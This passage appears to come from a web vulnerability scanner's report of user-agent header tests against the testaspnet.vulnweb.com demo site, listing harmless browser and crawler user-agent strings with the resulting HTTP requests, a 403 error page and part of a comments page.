Response Body - size: 1,233 bytes.	<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>403 - Forbidden: Access is denied.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>403 - Forbidden: Access is denied.</h2> <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3> </fieldset></div> </div> </body> </html>
URL	http://testaspnet.vulnweb.com/ads
Method	GET
Parameter	Header User-Agent
Attack	msnbot/1.1 (+http://search.msn.com/msnbot.htm)
Evidence
Show / hide Request and Response
Request Header - size: 314 bytes.	GET http://testaspnet.vulnweb.com/ads HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: msnbot/1.1 (+http://search.msn.com/msnbot.htm) Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 160 bytes.	HTTP/1.1 403 Forbidden Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:20 GMT Content-Length: 1233
Response Body - size: 1,233 bytes.	<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>403 - Forbidden: Access is denied.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>403 - Forbidden: Access is denied.</h2> <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3> </fieldset></div> </div> </body> </html>
URL	http://testaspnet.vulnweb.com/Comments.aspx?id=0
Method	GET
Parameter	Header User-Agent
Attack	Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Evidence
Show / hide Request and Response
Request Header - size: 452 bytes.	GET http://testaspnet.vulnweb.com/Comments.aspx?id=0 HTTP/1.1 Host: testaspnet.vulnweb.com user-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=0 Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:51:21 GMT Content-Length: 55888
Response Body - size: 55,888 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Comments</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Comments.aspx?id=0" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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